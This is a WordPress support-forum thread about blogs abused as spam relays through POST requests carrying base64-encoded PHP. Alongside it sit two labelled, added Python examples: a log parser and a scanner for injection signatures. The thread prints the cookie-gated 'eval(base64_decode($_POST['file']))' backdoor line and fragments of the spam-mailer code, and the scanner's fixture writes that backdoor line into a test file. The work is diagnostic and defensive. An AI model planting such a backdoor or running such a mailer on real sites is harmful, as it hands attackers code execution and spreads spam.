Support » Fixing WordPress » mail-spam relay over 3.0.1 POST exploit ? (base64_decode eval decrypt)

  • For a few weeks now, I have had a few WordPress blogs misused as a spam relay. With Apache mod_log_post I've now been able to catch the complete POST request, and here is how it looks (see below). This request sends a spam to a gmail.com account.

    To prevent this, I had to add these lines to the .htaccess:

    <Limit POST>
    order deny,allow
    deny from all
    </Limit>

    (but this also prevents editing).

    Is this a known issue? I saw some similar posts in the archives from about 1-2 years ago, but nothing really similar for the current 3.0.1 version.

    I'm still trying to find where in the WP code this 'file' variable is decoded and included, but without success so far. Maybe you will have a better idea?

    Regards,
    Olivier (managing the server, not the wp-setups)

    1) “raw” POST request:

    [Code moderated as per the Forum Rules. Please don’t re-post any hack code.]

    2) Decoded request:

    [Code moderated as per the Forum Rules. Please don’t re-post any hack code.]
    Thank you for your past orders with our company. We strive to improve our services and provide best delivery experience for your purchases.
    Please remember to place your orders on our new site. Once you get there please add it to your bookmarks for future reference.

    With kind regards,

    Support Team

    ".$fullname."
    ".$address."
    ".$city.", ".$state." ".$zipcode.", ".$country;

    ##########################################################

    [Code moderated as per the Forum Rules.]

Viewing 13 replies - 1 through 13 (of 13 total)
  • Thread Starter omueller

    (@omueller)

    PS: just checked the logs, and it always seems to come from this host: unn-95-168-210-229.superhosting.cz (95.168.210.229), with a spam about every 5 minutes. Since it is blocked (with the .htaccess), it tries other URLs…

    unn-95-168-210-229.superhosting.cz - - [16/Nov/2010:13:07:14 +0100] "POST / HTTP/1.1" 200 9 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
    unn-95-168-210-229.superhosting.cz - - [16/Nov/2010:13:18:15 +0100] "POST / HTTP/1.1" 200 32 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
    unn-95-168-210-229.superhosting.cz - - [16/Nov/2010:13:18:15 +0100] "POST / HTTP/1.1" 200 9 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
    unn-95-168-210-229.superhosting.cz - - [16/Nov/2010:13:43:09 +0100] "POST / HTTP/1.1" 403 202 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
    unn-95-168-210-229.superhosting.cz - - [16/Nov/2010:13:43:09 +0100] "POST /?s=google HTTP/1.1" 403 202 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
    unn-95-168-210-229.superhosting.cz - - [16/Nov/2010:13:43:09 +0100] "POST /wp-atom.php HTTP/1.1" 403 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
    unn-95-168-210-229.superhosting.cz - - [16/Nov/2010:13:43:09 +0100] "POST /wp-login.php HTTP/1.1" 403 214 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
    unn-95-168-210-229.superhosting.cz - - [16/Nov/2010:13:43:10 +0100] "POST /wp-login.php HTTP/1.1" 403 214 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
    unn-95-168-210-229.superhosting.cz - - [16/Nov/2010:13:43:33 +0100] "POST / HTTP/1.1" 403 202 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
    [...]
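    The log excerpt above is the kind of evidence a sysadmin can turn into a detection rule. The following is an added example (not code from the thread or from WordPress): a small Python parser for Apache combined-format lines that groups referer-less POSTs per client and reports how many were accepted (200) versus blocked (403), and how many accepted replies were tiny. The 9-byte 200 replies to `POST /` are consistent with a script that prints a short status string instead of rendering the page (the spam code quoted later in this thread ends with `echo "mail_good"`, which is exactly 9 bytes). The sample lines are constructed: the first four copy the pattern quoted above, the last two are ordinary visitor traffic from RFC 5737 documentation addresses for contrast. The `min_posts` and `tiny_body` thresholds are assumptions to tune for a real site.

    ```python
    import re
    from collections import defaultdict

    # Apache "combined" LogFormat, the format of the lines quoted in the thread.
    LOG_RE = re.compile(
        r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
        r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
        r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
    )

    # Constructed sample log: first four lines model the thread's excerpt (same
    # host, paths and status codes), last two are normal traffic for contrast.
    SAMPLE_LOG = """\
    unn-95-168-210-229.superhosting.cz - - [16/Nov/2010:13:07:14 +0100] "POST / HTTP/1.1" 200 9 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
    unn-95-168-210-229.superhosting.cz - - [16/Nov/2010:13:18:15 +0100] "POST / HTTP/1.1" 200 32 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
    unn-95-168-210-229.superhosting.cz - - [16/Nov/2010:13:43:09 +0100] "POST / HTTP/1.1" 403 202 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
    unn-95-168-210-229.superhosting.cz - - [16/Nov/2010:13:43:09 +0100] "POST /wp-login.php HTTP/1.1" 403 214 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
    192.0.2.10 - - [16/Nov/2010:13:20:01 +0100] "GET /2010/11/hello-world/ HTTP/1.1" 200 8841 "http://example.net/" "Mozilla/5.0"
    192.0.2.11 - - [16/Nov/2010:13:21:40 +0100] "POST /wp-comments-post.php HTTP/1.1" 302 0 "http://domain.ext/2010/11/hello-world/" "Mozilla/5.0"
    """


    def parse_line(line):
        """Return the fields of one combined-format line, or None if it does not parse."""
        m = LOG_RE.match(line.strip())
        return m.groupdict() if m else None


    def relay_candidates(lines, min_posts=3, tiny_body=100):
        """Group referer-less POSTs by client and keep clients with >= min_posts.

        A browser submitting a comment or login form normally sends a Referer; a
        script hitting the front page every few minutes does not.  For each client
        we count accepted (200) versus blocked (403) POSTs, and how many accepted
        replies were smaller than tiny_body bytes: a real front page is kilobytes,
        a backdoor echoing a status string is a handful of bytes.
        """
        stats = defaultdict(lambda: {"posts": 0, "accepted": 0, "blocked": 0, "tiny_replies": 0})
        for line in lines:
            rec = parse_line(line)
            if rec is None or rec["method"] != "POST" or rec["referer"] != "-":
                continue
            s = stats[rec["host"]]
            s["posts"] += 1
            if rec["status"] == "200":
                s["accepted"] += 1
                if rec["size"] != "-" and int(rec["size"]) < tiny_body:
                    s["tiny_replies"] += 1
            elif rec["status"] == "403":
                s["blocked"] += 1
        return {host: dict(s) for host, s in stats.items() if s["posts"] >= min_posts}


    if __name__ == "__main__":
        for host, s in relay_candidates(SAMPLE_LOG.splitlines()).items():
            print(host, s)
    ```

    Run against the real access log (`relay_candidates(open("/var/log/apache2/access.log"))`) the result gives the handful of client hosts worth a targeted deny rule, which is far less disruptive than the blanket `<Limit POST>` block that also locks out editing; a non-zero `tiny_replies` count is the stronger indicator, since it means the POST was actually accepted and answered by something other than the normal page.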
    Thread Starter omueller

    (@omueller)

    And here is the "disabled" hack code (just to give an idea; otherwise there is no way to answer the issue anymore…). Hack code has been removed.

    The question is why WordPress simply runs this code coming from a POST request with "file=xyz" as a parameter? Does it happen by default, or is it a bad configuration by the blog owner?

    1) “raw” POST request:

    Request: domain.ext 95.168.210.229 - - [16/Nov/2010:13:18:16 +0100] "POST / HTTP/1.1" 200 9 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3" jSLZPj4wA4wA
    ANRuqbIAAAAA "-"
    ----------------------------------------
    POST / HTTP/1.1
    Host: domain.ext
    Cookie: 545a398915a49f25=46b6f4af9be2faec;_wp_debugger=b5a7308802027b504c188deac3fa5c40;
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    Accept-Language: en-us,en;q=0.5
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
    Keep-Alive: 300
    Connection: keep-alive
    Content-Length: 8389
    Content-Type: application/x-www-form-urlencoded
    Expect: 100-continue
    
    8389
    file=QGV2YWwoZGVjcnlwdCgi...
    [censored]
    [censored]
    [censored]
    ...CiAgICB9DQogICAgcmV0dXJuICRyZXM7DQp9
    
    HTTP/1.1 200 OK
    Expires: Tue, 09 Nov 2010 12:18:16 GMT
    Last-Modified: Tue, 16 Nov 2010 12:18:16 GMT

    2) Decoded request:

    @eval(decrypt("...[censored]...")
    [...]

    3) Final spam code:

    unset($_POST['file']); $stage="second";
    [...]
    $domain = substr($from, strpos($from, "@"), strlen($from));
    $header = "From: ".$realname." <".$from.">\r\n";
    $header .= "Message-Id: <130746".mt_rand(1000,2000).".".mt_rand(0,2000).$domain.">\r\n";
    $header .= "MIME-Version: 1.0\r\n";
    $header .= "Content-Type: text/html\r\n";
    $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
    $header .= nl2br($message)."\r\n";
    
    if(mail($to,$subject,"",$header)) echo "mail_good";
    [...]
    Thread Starter omueller

    (@omueller)

    Strange, am I the only one with this spam problem?

    Good analysis!

    The POST request you posted exactly matches the hack described here:
    http://vanillaforums.org/discussion/8131/wp_debugger-error/p1

    Please check the index.php of your WordPress installation for a code injection with the following content:
    if(md5($_COOKIE['_wp_debugger'])=="c4460c548c319f361cd75496359cc674"){ eval(base64_decode($_POST['file'])); exit; }

    or at least this part:
    eval(base64_decode($_POST['file']));

    Then the interesting figures for further analysis are:
    * When was the index.php last modified?
    * Which updates (versions) did you do since the last modification date?
    * If you still have logs from this date, what requests were made at the same time in your FTP and access logs?
    * Maybe it is important to know where you got the update for your WordPress from.

    Did you already 'grep' your WordPress installation for the string $_POST['file']? (Because you write that you already searched for the variable.)

    If you did update, the question for the WordPress team should be why this injection was not overwritten by the update.

    Thread Starter omueller

    (@omueller)

    Thanks for your feedback heincredibleDude! Yes, it's similar to this 2008 bug, but not exactly the same. I checked the files for "_wp_debugger" and other things ($_POST['file']) but with no success.

    index.php has been modified by the web designer, but doesn't seem to contain any "bad" or injected code. But I also see many old files (from 2008) which should probably have been deleted or at least updated.

    I also just found a directory called "..." (3 dots) in the wp-content directory with some "strange" things inside:

    drwxrwxr-x  10      512 Aug 30 00:58 .
    drwxrwxrwx  10      512 Oct 26 14:13 ..
    drwxr-xr-x   4      512 Aug 30 00:58 addthis
    -rw-rw-r--   1      677 Aug 27 12:03 adrotator.php
    drwxrwxr-x   5      512 Aug 24  2009 audioplayer
    -rw-r--r--   1     2240 May  3  2010 hello.php
    -rw-r--r--   1       30 Apr 15  2009 index.php
    drwxrwxr-x   4      512 Feb  6  2009 photopress
    -rw-rw-r--   1   133120 Jun 10  2009 photopress.tar
    -rw-rw-r--   1    39846 Jun 10  2009 photopress_1.5.2.zip
    drwxrwxrwt   4      512 Jul 26  2009 postie
    -rw-rw-r--   1  1331253 Jun 10  2009 postie.1.2.3.zip
    -rw-rw-r--   1  1474560 Jun 10  2009 postie.tar
    drwxrwxr-x   7     1024 Aug 24  2009 proplayer
    drwxr-xr-x   5      512 Aug 27 14:49 quick-cache
    -rw-rw-r--   1     1823 Jun 10  2009 redirectify.php
    drwxrwxr-x   2      512 Jan  4  2010 videos-plugin
    -rw-rw-r--   1    31091 Jun 10  2009 wp-db-backup.php
    -rw-rw-r--   1    52709 Jun 10  2009 wp-super-cache.0.9.4.3.zip
    -rw-rw-r--   1     7613 Jun 10  2009 wp-xmlmigrate.php
    drwxr-xr-x   2      512 Aug 30 00:36 youtube
    -rw-rw-r--   1     1497 Jun 10  2009 youtube.1.php

    but there doesn't seem to be any include ".../xyz" in the code. Maybe it was removed with the 3.0.1 upgrade, but there is definitely something to be done there.

    I will ask the webmaster to do a clean installation and to remove any old file first.

    To be continued!
    regards, O.
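    The two posts above describe the same manual triage from both sides: heincredibleDude asks for a grep of the install for `$_POST['file']` and for the modification time of index.php, and omueller then finds a directory named "..." full of leftover plugin archives in wp-content. The following is an added example, not code from the thread or from WordPress, that automates that sweep in Python: it walks an install, reports PHP files matching the injection signatures quoted in this thread (`eval(base64_decode(`, `$_POST['file']`, the `_wp_debugger` cookie name, and the `$_GET['license']` variant from the linked thread) together with their mtime, flags directory names made only of dots, and lists leftover archives. `build_sample_tree()` creates a constructed fixture in a temporary directory so the scan can be run offline; the md5 value in the fixture is a placeholder, not the hash from the thread.

    ```python
    import os
    import re
    import tempfile
    from datetime import datetime, timezone

    # Signatures quoted in this thread (index.php backdoor, its cookie name) and
    # the $_GET['license'] variant from the linked support topic.
    INJECTION_PATTERNS = {
        "eval(base64_decode(...))": re.compile(r"eval\s*\(\s*base64_decode\s*\("),
        "$_POST['file']": re.compile(r"\$_POST\s*\[\s*['\"]file['\"]\s*\]"),
        "_wp_debugger cookie": re.compile(r"_wp_debugger"),
        "$_GET['license']": re.compile(r"\$_GET\s*\[\s*['\"]license['\"]\s*\]"),
    }
    ARCHIVE_SUFFIXES = (".zip", ".tar", ".tar.gz", ".tgz")
    PHP_SUFFIXES = (".php", ".phtml", ".inc")


    def _mtime(path):
        """ISO-8601 UTC modification time, the 'when was it last modified' question."""
        return datetime.fromtimestamp(os.stat(path).st_mtime, tz=timezone.utc).isoformat()


    def scan_tree(root):
        """Walk a WordPress install; return sorted (kind, relative path, mtime) findings."""
        findings = []
        for dirpath, dirnames, filenames in os.walk(root):
            for d in dirnames:
                # "..." is a legal Unix name that hides from a casual 'ls' and
                # has no business inside a WordPress tree.
                if set(d) == {"."}:
                    full = os.path.join(dirpath, d)
                    findings.append(("dot-only directory", os.path.relpath(full, root), _mtime(full)))
            for f in filenames:
                full = os.path.join(dirpath, f)
                rel = os.path.relpath(full, root)
                if f.endswith(ARCHIVE_SUFFIXES):
                    findings.append(("stale archive", rel, _mtime(full)))
                    continue
                if not f.endswith(PHP_SUFFIXES):
                    continue
                try:
                    with open(full, "r", encoding="utf-8", errors="replace") as fh:
                        src = fh.read()
                except OSError:
                    continue
                for name, pat in INJECTION_PATTERNS.items():
                    if pat.search(src):
                        findings.append(("injected code: " + name, rel, _mtime(full)))
        return sorted(findings)


    def build_sample_tree():
        """Constructed fixture (not a real site): one clean plugin file, one index.php
        carrying the one-liner quoted in this thread with a placeholder hash, a "..."
        directory under wp-content, and a leftover plugin archive inside it."""
        root = tempfile.mkdtemp(prefix="wp-scan-")
        os.makedirs(os.path.join(root, "wp-content", "...", "postie"))
        os.makedirs(os.path.join(root, "wp-content", "plugins", "hello"))
        with open(os.path.join(root, "wp-content", "plugins", "hello", "hello.php"), "w") as fh:
            fh.write("<?php\n// harmless plugin stub\necho 'hello';\n")
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write("<?php\nrequire('./wp-blog-header.php');\n"
                     "if(md5($_COOKIE['_wp_debugger'])==\"PLACEHOLDER_HASH\")"
                     "{ eval(base64_decode($_POST['file'])); exit; }\n")
        with open(os.path.join(root, "wp-content", "...", "postie.1.2.3.zip"), "wb") as fh:
            fh.write(b"PK\x05\x06" + b"\x00" * 18)  # empty zip archive
        return root


    if __name__ == "__main__":
        for kind, rel, when in scan_tree(build_sample_tree()):
            print(f"{kind:40} {rel:45} {when}")
    ```

    On a real install call `scan_tree("/var/www/blog")` and compare the reported mtimes with the FTP and access logs for the same minute, which is exactly the cross-check heincredibleDude asks for; a file that matches a signature but has an mtime older than the last upgrade is the interesting case, because an upgrade that did not overwrite it is the question the thread ends up asking.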

    Hi,

    I have found an additional injection described here:
    http://wordpress.org/support/topic/cant-save-edit-or-publish?replies=77#post-1079851

    if(isset($_GET['license']))

    Another injection was done with the URL 'wordpress.net.in' here:
    http://gordon.dewis.ca/2008/01/06/expunging-the-wordpressnetin-spam-injection-hijack/

    These files contained the same injection as I described in my first post. Can you check for this injection?

    Thread Starter omueller

    (@omueller)

    Checked and nothing. All these “old” injections were for much older versions of WordPress: 3.0.1 is installed here… 🙂

    This is right, but are you sure that your WordPress was not hacked before the update?

    Can you post the source code of your actual index.php here?

    And additionally: can you check your database for unknown users with admin rights? Named like:
    WordPress or
    admina
    adminb

    adminz

    Then, regarding the "..." directory: can you check your FTP and access logs at the creation timestamp of this directory? Maybe this was created via FTP.

    Please post your source code here:
    http://wordpress.pastebin.com

    and report the link back here. Please don't post more than a few lines of code in the forums!

    Thread Starter omueller

    (@omueller)

    No, I can't be sure, as I'm just the sysadmin there, not the webpage manager, but the spam relay issue is a problem for me, so that's why I'm looking at that… But there was probably a problem before, because the blog was already relaying spam before the upgrade to 3.0.1 (that's why it was upgraded).

    DB looks ok, just one admin user and a few standard users.

    FTP log also ok, so it most probably came from the web. I will check the weblogs archive later.

    index.php is the same as in the wordpress-3.0.1.zip distribution.

    I guess there must be some files from old installations lying around… We'll try an installation from scratch later this week or next week.

    Ok. When you have tidied up the webspace, please observe the behaviour. If it still appears, then please post here again.

    It is important for me to know whether this hack can really be done via WordPress 3.0.1, because I have some installations of this version running.

    Thank you for sharing all this information!

    I noticed this same behavior on a v2.8.2 install. Logged first occurrence on Dec 9th, originating from 95.168.210.229. Any idea if this was addressed in the latest release (v3.0.3)?

    I started seeing spam being relayed through our network, and traced the requests back to exactly the same thing that iso00 has described here.

    I have confirmed the spam to have originated from blogs running WordPress 1.5, 2.1, and 2.5.1, so far. They all have the same characteristics so far: they were all POST requests to the index.php page, and they all originated from 95.168.210.229. The spam mail payload is slightly different, but it's still for a viagra pharmacy. The payload is as follows:

    “Hello,

    10 Days Sale Only – 10% off on everything in our store – this offer ends on Midnight January 30th.
    Do not wait – Use your coupon at check out today
    Your Discount Code: <b>weusduwiwoop</b>

    Happy New Year!
    CVS Team"

    I’ve looked at the WordPress files for several of these sites, and there really is nothing in common with them. They don’t seem to have any themes or plugins installed in common. The source code appears to be unaltered (i.e. no malicious code modifications or injections).

    It’s a bit disturbing that this appears to be some long-standing function in WordPress that will happily perform the requested remote code execution. Has anyone tried the POST code that iso00 posted on a fresh, vanilla install of WordPress to verify whether this is the case?

  • The topic ‘mail-spam relay over 3.0.1 POST exploit ? (base64_decode eval decrypt)’ is closed to new replies.